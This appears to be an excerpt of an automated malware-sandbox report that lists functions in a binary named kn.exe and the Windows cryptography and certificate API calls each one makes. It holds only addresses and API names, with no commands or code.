          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B2CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,7_2_00007FF6854B2CFC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6D2C NCryptFreeBuffer,#360,7_2_00007FF6854E6D2C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685472D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF685472D18
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685474CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,7_2_00007FF685474CC0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685508CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,7_2_00007FF685508CF4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6CE0 NCryptEnumStorageProviders,#360,7_2_00007FF6854E6CE0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0B80 NCryptCreatePersistedKey,#205,#359,#359,#357,7_2_00007FF6854B0B80
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DCBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,7_2_00007FF6854DCBB4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,7_2_00007FF68543CB98
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E0B9C CryptHashData,GetLastError,#357,7_2_00007FF6854E0B9C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68551EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,7_2_00007FF68551EB38
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6C30 NCryptOpenStorageProvider,#360,7_2_00007FF6854E6C30
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,7_2_00007FF68544CC24
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B2BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6854B2BC0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E0BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,7_2_00007FF6854E0BF4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D9688 CryptFindOIDInfo,#357,#360,#360,#360,7_2_00007FF6854D9688
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854676B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF6854676B0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854CD6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,7_2_00007FF6854CD6A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B3654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF6854B3654
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DF650 CryptHashCertificate2,SetLastError,7_2_00007FF6854DF650
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854AF644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854AF644
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,7_2_00007FF68548366C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549B664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,7_2_00007FF68549B664
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543D660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF68543D660
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685425664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,7_2_00007FF685425664
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B36E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6854B36E8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549F6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,7_2_00007FF68549F6D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B3590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6854B3590
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E9580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,7_2_00007FF6854E9580
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DF570 CryptHashCertificate,SetLastError,7_2_00007FF6854DF570
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547B55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,7_2_00007FF68547B55C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854995FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,7_2_00007FF6854995FC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543F630 CryptAcquireContextW,GetLastError,#357,SetLastError,7_2_00007FF68543F630
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543D5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68543D5C2
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854755F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,7_2_00007FF6854755F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685489878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,7_2_00007FF685489878
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685447884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,7_2_00007FF685447884
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E98B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF6854E98B0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549D850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,7_2_00007FF68549D850
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF6854A184C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B3860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6854B3860
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854238FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF6854238FC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685433918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF685433918
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,7_2_00007FF6854B391C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DF918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,7_2_00007FF6854DF918
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549B8D0 I_CryptGetLruEntryData,#357,7_2_00007FF68549B8D0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854818DC CertFindExtension,CryptDecodeObject,GetLastError,#357,7_2_00007FF6854818DC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68542B788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,7_2_00007FF68542B788
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854CB794 CryptExportPublicKeyInfoEx,SetLastError,7_2_00007FF6854CB794
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544D790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,7_2_00007FF68544D790
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548577C #360,#358,CryptDecodeObject,GetLastError,#357,7_2_00007FF68548577C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B37A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6854B37A4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DD750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,7_2_00007FF6854DD750
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B5768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854B5768
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547F774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,7_2_00007FF68547F774
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549B808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,7_2_00007FF68549B808
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544F810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF68544F810
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DF7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,7_2_00007FF6854DF7FC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854517D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,7_2_00007FF6854517D4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C97E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,7_2_00007FF6854C97E4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E7290 NCryptIsKeyHandle,#359,#360,#357,#358,7_2_00007FF6854E7290
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DD28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,7_2_00007FF6854DD28C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B32A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF6854B32A8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547B2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,7_2_00007FF68547B2B4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544D240 #357,CryptFindOIDInfo,#357,LocalFree,7_2_00007FF68544D240
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549D30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,7_2_00007FF68549D30C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544D304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,7_2_00007FF68544D304
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544B324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,7_2_00007FF68544B324
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854932D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF6854932D0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854792C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,7_2_00007FF6854792C4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854AF2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854AF2F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854892D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,7_2_00007FF6854892D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685493188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,7_2_00007FF685493188
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E7178 BCryptCloseAlgorithmProvider,#360,7_2_00007FF6854E7178
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854851A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,7_2_00007FF6854851A4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549F168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,7_2_00007FF68549F168
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685495164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF685495164
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E7214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,7_2_00007FF6854E7214
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685509208 #357,NCryptEnumKeys,#360,#358,7_2_00007FF685509208
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B11C8 NCryptVerifySignature,#205,#357,#357,#357,#357,7_2_00007FF6854B11C8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E71C8 BCryptDestroyKey,#360,7_2_00007FF6854E71C8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B31C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF6854B31C0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549F488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,7_2_00007FF68549F488
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B9480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854B9480
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DF4A0 CryptHashPublicKeyInfo,SetLastError,7_2_00007FF6854DF4A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685415438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,7_2_00007FF685415438
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854CB464 CryptEncodeObjectEx,SetLastError,7_2_00007FF6854CB464
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B34F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF6854B34F8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685473504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,7_2_00007FF685473504
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E14F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,7_2_00007FF6854E14F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854CB4EC CryptDecodeObjectEx,SetLastError,7_2_00007FF6854CB4EC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B3390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF6854B3390
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C33B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,7_2_00007FF6854C33B0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854933A0 CryptVerifyCertificateSignature,CertCompareCertificateName,7_2_00007FF6854933A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E93A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6854E93A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,7_2_00007FF6854E739C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546B350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,7_2_00007FF68546B350
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685475338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF685475338
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685447340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,7_2_00007FF685447340
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543B36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,7_2_00007FF68543B36C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6854B342C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF6854E141C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854953E8 CryptEncodeObjectEx,GetLastError,#357,7_2_00007FF6854953E8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854713F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,7_2_00007FF6854713F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF68549B3D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549DEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,7_2_00007FF68549DEB0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546DEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,7_2_00007FF68546DEA4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685515E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,7_2_00007FF685515E3C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DDE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,7_2_00007FF6854DDE70
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685515F20 CryptDecodeObjectEx,7_2_00007FF685515F20
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685467F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,7_2_00007FF685467F14
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A5F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,7_2_00007FF6854A5F04
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E7EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,7_2_00007FF6854E7EE8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C5D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,7_2_00007FF6854C5D80
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546DD80 CertFindExtension,CryptDecodeObject,7_2_00007FF68546DD80
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685445DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF685445DA1
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854EBD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,7_2_00007FF6854EBD3C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E7D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,7_2_00007FF6854E7D3C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685515D74 CryptDecodeObjectEx,strcmp,strcmp,7_2_00007FF685515D74
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685469D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF685469D6C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685471D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF685471D70
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685493D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,7_2_00007FF685493D60
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685445DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,7_2_00007FF685445DF7
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A1E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,7_2_00007FF6854A1E2C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685421DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,7_2_00007FF685421DE8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DE044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,7_2_00007FF6854DE044
